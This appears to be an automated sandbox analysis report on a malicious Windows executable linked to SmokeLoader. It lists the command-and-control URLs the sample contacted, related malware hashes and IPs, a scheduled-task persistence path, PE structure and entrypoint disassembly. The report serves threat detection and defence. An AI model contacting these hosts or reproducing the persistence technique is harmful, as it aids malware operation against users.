https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew	0%	URL Reputation	safe
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark	0%	URL Reputation	safe
https://api.msn.com/q	0%	URL Reputation	safe
https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&oc	0%	URL Reputation	safe
https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe	0%	URL Reputation	safe
https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg	0%	URL Reputation	safe
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark	0%	URL Reputation	safe
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg	0%	URL Reputation	safe
https://wns.windows.com/L	0%	URL Reputation	safe
https://word.office.com	0%	URL Reputation	safe
https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings	0%	URL Reputation	safe
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu	0%	URL Reputation	safe
https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew	0%	URL Reputation	safe
https://aka.ms/Vh5j3k	0%	URL Reputation	safe
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu	0%	URL Reputation	safe
https://api.msn.com/v1/news/Feed/Windows?&	0%	URL Reputation	safe
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svg	0%	URL Reputation	safe
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark	0%	URL Reputation	safe
https://www.rd.com/list/polite-habits-campers-dislike/	0%	URL Reputation	safe
https://android.notify.windows.com/iOS	0%	URL Reputation	safe
https://api.msn.com/	0%	URL Reputation	safe
https://outlook.com_	0%	URL Reputation	safe
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark	0%	URL Reputation	safe
https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
unicea.ws	123.213.233.131	true	true	11%, Virustotal, Browse	unknown
tech-servers.in.net	unknown	unknown	true	4%, Virustotal, Browse	unknown
nwgrus.ru	unknown	unknown	true	12%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Reputation
http://unicea.ws/tmp/index.php	true	unknown
http://nwgrus.ru/tmp/index.php	true	unknown
http://tech-servers.in.net/tmp/index.php	true	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://aka.ms/odirmr	explorer.exe, 00000001.00000000.1744130218.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV	explorer.exe, 00000001.00000000.1744130218.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-cl	explorer.exe, 00000001.00000000.1744130218.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://powerpoint.office.comcember	explorer.exe, 00000001.00000000.1748271457.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.msn.com:443/v1/news/Feed/Windows?	explorer.exe, 00000001.00000000.1744130218.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1745872183.00000000097D4000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-	explorer.exe, 00000001.00000000.1744130218.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://excel.office.com	explorer.exe, 00000001.00000000.1748271457.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.micro	explorer.exe, 00000001.00000000.1745408529.0000000008720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1744921630.0000000007F40000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1746652711.0000000009B60000.00000002.00000001.00040000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we	explorer.exe, 00000001.00000000.1744130218.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://simpleflying.com/how-do-you-become-an-air-traffic-controller/	explorer.exe, 00000001.00000000.1744130218.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY	explorer.exe, 00000001.00000000.1744130218.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew	explorer.exe, 00000001.00000000.1744130218.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark	explorer.exe, 00000001.00000000.1744130218.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-mi	explorer.exe, 00000001.00000000.1744130218.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://api.msn.com/q	explorer.exe, 00000001.00000000.1745872183.00000000097D4000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&oc	explorer.exe, 00000001.00000000.1744130218.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe	explorer.exe, 00000001.00000000.1748271457.000000000C893000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1	explorer.exe, 00000001.00000000.1744130218.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg	explorer.exe, 00000001.00000000.1744130218.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark	explorer.exe, 00000001.00000000.1744130218.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-A	explorer.exe, 00000001.00000000.1744130218.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1744130218.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg	explorer.exe, 00000001.00000000.1744130218.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.autoitscript.com/autoit3/J	explorer.exe, 00000001.00000000.1748271457.000000000C964000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://wns.windows.com/L	explorer.exe, 00000001.00000000.1748271457.000000000C557000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://word.office.com	explorer.exe, 00000001.00000000.1748271457.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings	explorer.exe, 00000001.00000000.1744130218.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu	explorer.exe, 00000001.00000000.1744130218.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headerevent	explorer.exe, 00000001.00000000.1744130218.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win	explorer.exe, 00000001.00000000.1744130218.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew	explorer.exe, 00000001.00000000.1744130218.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-	explorer.exe, 00000001.00000000.1744130218.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://aka.ms/Vh5j3k	explorer.exe, 00000001.00000000.1744130218.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu	explorer.exe, 00000001.00000000.1744130218.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.msn.com/v1/news/Feed/Windows?&	explorer.exe, 00000001.00000000.1745872183.00000000096DF000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svg	explorer.exe, 00000001.00000000.1744130218.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark	explorer.exe, 00000001.00000000.1744130218.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.rd.com/list/polite-habits-campers-dislike/	explorer.exe, 00000001.00000000.1744130218.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://android.notify.windows.com/iOS	explorer.exe, 00000001.00000000.1748271457.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/ar	explorer.exe, 00000001.00000000.1744130218.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img	explorer.exe, 00000001.00000000.1744130218.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://api.msn.com/	explorer.exe, 00000001.00000000.1745872183.00000000097D4000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-d	explorer.exe, 00000001.00000000.1744130218.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://outlook.com_	explorer.exe, 00000001.00000000.1748271457.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark	explorer.exe, 00000001.00000000.1744130218.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com:443/en-us/feed	explorer.exe, 00000001.00000000.1744130218.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe	explorer.exe, 00000001.00000000.1744130218.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at	explorer.exe, 00000001.00000000.1744130218.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-of	explorer.exe, 00000001.00000000.1744130218.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
116.58.10.60	unknown	Pakistan		17563	NEXLINX-AS-APAutonomousSystemNumberforNexlinxPK	true
123.213.233.131	unicea.ws	Korea Republic of		9318	SKB-ASSKBroadbandCoLtdKR	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1537536
Start date and time:	2024-10-19 06:41:04 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 40s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	7
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	50f86ebddd156619b173883981364d8955365d76d2c3a.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@2/2@61/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 30 Number of non-executed functions: 9
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtOpenKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
00:42:23	API Interceptor	444432x Sleep call for process: explorer.exe modified
05:42:22	Task Scheduler	Run new task: Firefox Default Browser Agent A57227A213EF99E5 path: C:\Users\user\AppData\Roaming\vbirvce

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
116.58.10.60	wBgwzVbZuV.exe	Get hash	malicious	SmokeLoader	Browse	nwgrus.ru/tmp/index.php
	KTh1gQlT9a.exe	Get hash	malicious	SmokeLoader	Browse	nwgrus.ru/tmp/index.php
	7zaC3J8wBV.exe	Get hash	malicious	LummaC, Go Injector, SmokeLoader	Browse	100xmargin.com/tmp/index.php
	uue9O7WXRA.exe	Get hash	malicious	SmokeLoader	Browse	gebeus.ru/tmp/index.php
	a6lzHWp4pa.exe	Get hash	malicious	LummaC, CryptOne, LummaC Stealer, SmokeLoader, Vidar	Browse	bipto.org/tmp/index.php
123.213.233.131	6e41bbf45206030f9a1277d06f28e467d8877ad2b0ea2.exe	Get hash	malicious	SmokeLoader	Browse	unicea.ws/tmp/index.php
	t3TkmcMmcA.exe	Get hash	malicious	SmokeLoader	Browse	tnc-corp.ru/tmp/index.php
	JeFu7HwJRa.exe	Get hash	malicious	SmokeLoader	Browse	epohe.ru/tmp/
	z0PrDUH3Ab.exe	Get hash	malicious	SmokeLoader	Browse	movlat.com/tmp/
	PADD8toZVX.exe	Get hash	malicious	LummaC, Babuk, Clipboard Hijacker, Djvu, Glupteba, LummaC Stealer, Mars Stealer	Browse	sdfjhuz.com/dl/build2.exe
	etNheGz9UQ.exe	Get hash	malicious	Glupteba, Petite Virus, Raccoon Stealer v2, RedLine, SmokeLoader, Socks5Systemz	Browse	humydrole.com/tmp/index.php
	file.exe	Get hash	malicious	SmokeLoader	Browse	humydrole.com/tmp/index.php
	file.exe	Get hash	malicious	Glupteba, Petite Virus, RedLine, SmokeLoader, Socks5Systemz	Browse	humydrole.com/tmp/index.php
	file.exe	Get hash	malicious	SmokeLoader	Browse	humydrole.com/tmp/index.php
	sGNsvCLzq0.exe	Get hash	malicious	SmokeLoader	Browse	humydrole.com/tmp/index.php

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
unicea.ws	bdSfcB8sLh.exe	Get hash	malicious	SmokeLoader	Browse	197.164.156.210
	6e41bbf45206030f9a1277d06f28e467d8877ad2b0ea2.exe	Get hash	malicious	SmokeLoader	Browse	197.164.156.210
	llZnKf40fR.exe	Get hash	malicious	SmokeLoader	Browse	63.143.98.185

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
NEXLINX-AS-APAutonomousSystemNumberforNexlinxPK	wBgwzVbZuV.exe	Get hash	malicious	SmokeLoader	Browse	116.58.10.60
	KTh1gQlT9a.exe	Get hash	malicious	SmokeLoader	Browse	116.58.10.60
	7zaC3J8wBV.exe	Get hash	malicious	LummaC, Go Injector, SmokeLoader	Browse	116.58.10.60
	uue9O7WXRA.exe	Get hash	malicious	SmokeLoader	Browse	116.58.10.60
	y7cm9CKSN9.elf	Get hash	malicious	Mirai	Browse	116.58.43.103
	yJgVAg26w0.elf	Get hash	malicious	Mirai	Browse	116.58.43.106
	7ZEAQv0SZ6.elf	Get hash	malicious	Mirai, Moobot	Browse	202.59.68.26
	7048CflwYY.exe	Get hash	malicious	LummaC, SmokeLoader	Browse	116.58.10.59
	a6lzHWp4pa.exe	Get hash	malicious	LummaC, CryptOne, LummaC Stealer, SmokeLoader, Vidar	Browse	116.58.10.60
	2.exe	Get hash	malicious	SmokeLoader	Browse	116.58.10.60
SKB-ASSKBroadbandCoLtdKR	6e41bbf45206030f9a1277d06f28e467d8877ad2b0ea2.exe	Get hash	malicious	SmokeLoader	Browse	123.213.233.131
	Qb8aDBHtQi.elf	Get hash	malicious	Unknown	Browse	180.68.127.108
	mirai.ppc.elf	Get hash	malicious	Mirai	Browse	211.213.102.69
	mirai.mips.elf	Get hash	malicious	Mirai	Browse	58.232.123.65
	EMnyl2klUV.elf	Get hash	malicious	Mirai	Browse	211.117.104.68
	spc.elf	Get hash	malicious	Mirai	Browse	218.52.2.124
	mpsl.elf	Get hash	malicious	Mirai	Browse	114.201.2.15
	mips.elf	Get hash	malicious	Mirai	Browse	211.206.13.90
	armv6l.elf	Get hash	malicious	Unknown	Browse	116.126.1.94
	ppc.elf	Get hash	malicious	Mirai	Browse	219.249.234.192

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	454144
Entropy (8bit):	6.357429709130068
Encrypted:	false
SSDEEP:	6144:HodLe5U3K0CfIvA2fLLRRjThRIDVNrEu+MykNso/0S2y6BbO42T8:6i5UafTsLbjTh2DzL+r2eNO4O
MD5:	EA2E25EFD40CEBD5E9535B91D8E3F61F
SHA1:	85AFD5690C90716EB35FE57E78C1204EE7C6EB22
SHA-256:	50F86EBDDD156619B173883981364D8955365D76D2C3AE9391EC911E65551BE9
SHA-512:	CF4BF97674BA99A43A81BD594AF91AE11B0FB32A1BF4224EFF39EEE56E7CA6C125CA88E073A0342E0AD8F844386ADB6C8406BA66050B8110E1B25194542F6997
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 74%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........io..............~.......~.......~.......p..........3....~.......~.......~......Rich............PE..L...n..d.............................;............@..................................9......................................@...x......................................................................@............................................text............................... ..`.rdata.............................@..@.data............`..................@....guj................................@..@.ber................................@..@.medajim............................@....rsrc...............................@..@........................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\vbirvce:Zone.Identifier

Download File

Process:	C:\Windows\explorer.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Reputation:	high, very likely benign file
Preview:	[ZoneTransfer]....ZoneId=0

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.357429709130068
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	50f86ebddd156619b173883981364d8955365d76d2c3a.exe
File size:	454'144 bytes
MD5:	ea2e25efd40cebd5e9535b91d8e3f61f
SHA1:	85afd5690c90716eb35fe57e78c1204ee7c6eb22
SHA256:	50f86ebddd156619b173883981364d8955365d76d2c3ae9391ec911e65551be9
SHA512:	cf4bf97674ba99a43a81bd594af91ae11b0fb32a1bf4224eff39eee56e7ca6c125ca88e073a0342e0ad8f844386adb6c8406ba66050b8110e1b25194542f6997
SSDEEP:	6144:HodLe5U3K0CfIvA2fLLRRjThRIDVNrEu+MykNso/0S2y6BbO42T8:6i5UafTsLbjTh2DzL+r2eNO4O
TLSH:	06A4C00262B5AEE0F7D64A338D1DE6E8A66DF851EE186777321E3B1F1B70571C222311
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........io..............~.......~.......~.......p..........3....~.......~.......~......Rich............PE..L...n..d...................

File Icon


Icon Hash:	41294945514d610d

Static PE Info

General

Entrypoint:	0x403bf9
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	TERMINAL_SERVER_AWARE
Time Stamp:	0x64B2FF6E [Sat Jul 15 20:19:58 2023 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	cf2df69e8bb6acbf3b231da2c6f4bda2

Entrypoint Preview

Instruction
call 00007F436CF65CF9h
jmp 00007F436CF62C4Eh
push dword ptr [00451258h]
call dword ptr [0040F12Ch]
test eax, eax
je 00007F436CF62DC4h
call eax
push 00000019h
call 00007F436CF655DBh
push 00000001h
push 00000000h
call 00007F436CF62580h
add esp, 0Ch
jmp 00007F436CF62545h
mov edi, edi
push ebp
mov ebp, esp
sub esp, 20h
mov eax, dword ptr [ebp+08h]
push esi
push edi
push 00000008h
pop ecx
mov esi, 0040F3C0h
lea edi, dword ptr [ebp-20h]
rep movsd
mov dword ptr [ebp-08h], eax
mov eax, dword ptr [ebp+0Ch]
pop edi
mov dword ptr [ebp-04h], eax
pop esi
test eax, eax
je 00007F436CF62DCEh
test byte ptr [eax], 00000008h
je 00007F436CF62DC9h
mov dword ptr [ebp-0Ch], 01994000h
lea eax, dword ptr [ebp-0Ch]
push eax
push dword ptr [ebp-10h]
push dword ptr [ebp-1Ch]
push dword ptr [ebp-20h]
call dword ptr [0040F160h]
leave
retn 0008h
mov edi, edi
push ebp
mov ebp, esp
push ecx
push ebx
mov eax, dword ptr [ebp+0Ch]
add eax, 0Ch
mov dword ptr [ebp-04h], eax
mov ebx, dword ptr fs:[00000000h]
mov eax, dword ptr [ebx]
mov dword ptr fs:[00000000h], eax
mov eax, dword ptr [ebp+08h]
mov ebx, dword ptr [ebp+0Ch]
mov ebp, dword ptr [ebp-04h]
mov esp, dword ptr [ebx-04h]
jmp eax
pop ebx
leave
retn 0008h
pop eax
pop ecx
xchg dword ptr [esp], eax
jmp eax
pop eax
pop ecx
xchg dword ptr [esp], eax
jmp eax
pop eax
pop ecx
xchg dword ptr [esp], eax
jmp eax

Rich Headers

Programming Language:

[ASM] VS2010 build 30319
[C++] VS2010 build 30319
[ C ] VS2010 build 30319
[IMP] VS2008 SP1 build 30729
[RES] VS2010 build 30319
[LNK] VS2010 build 30319

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x49b40	0x78	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x60000	0x1f108	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x49bb8	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x490c8	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0xf000	0x1fc	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0xd4dd	0xd600	2039712dbf7a50bd45433c889e87fcc3	False	0.6018910630841121	data	6.671203412552697	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0xf000	0x3b6d2	0x3b800	2c06279e133be36d01ccfae1bcdf0cfb	False	0.7520803243172269	data	6.870956222424823	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x4b000	0x11cc0	0x6000	648a35f029250a8b7b7d327c0ee5cba4	False	0.0838623046875	data	1.0912838539385947	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.guj	0x5d000	0x400	0x400	0f343b0931126a20f133d67c2b018a3b	False	0.0166015625	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.ber	0x5e000	0xd6	0x200	bf619eac0cdf3f68d496ea9344137e8b	False	0.02734375	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.medajim	0x5f000	0x400	0x400	0f343b0931126a20f133d67c2b018a3b	False	0.0166015625	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x60000	0x1f108	0x1f200	af0679af61ade9ddd6c88c0067976997	False	0.4242124748995984	data	5.055365166130212	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_CURSOR	0x79b78	0x330	Device independent bitmap graphic, 48 x 96 x 1, image size 0			0.1948529411764706
RT_CURSOR	0x79ea8	0x130	Device independent bitmap graphic, 32 x 64 x 1, image size 0			0.33223684210526316
RT_CURSOR	0x7a000	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0			0.2953091684434968
RT_CURSOR	0x7aea8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0			0.46705776173285196
RT_CURSOR	0x7b750	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0			0.5361271676300579
RT_CURSOR	0x7bce8	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0			0.30943496801705755
RT_CURSOR	0x7cb90	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0			0.427797833935018
RT_CURSOR	0x7d438	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0			0.5469653179190751
RT_ICON	0x60ac0	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	Tamil	India	0.3694029850746269
RT_ICON	0x60ac0	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	Tamil	Sri Lanka	0.3694029850746269
RT_ICON	0x61968	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	Tamil	India	0.4553249097472924
RT_ICON	0x61968	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	Tamil	Sri Lanka	0.4553249097472924
RT_ICON	0x62210	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0	Tamil	India	0.4619815668202765
RT_ICON	0x62210	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0	Tamil	Sri Lanka	0.4619815668202765
RT_ICON	0x628d8	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	Tamil	India	0.4552023121387283
RT_ICON	0x628d8	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	Tamil	Sri Lanka	0.4552023121387283
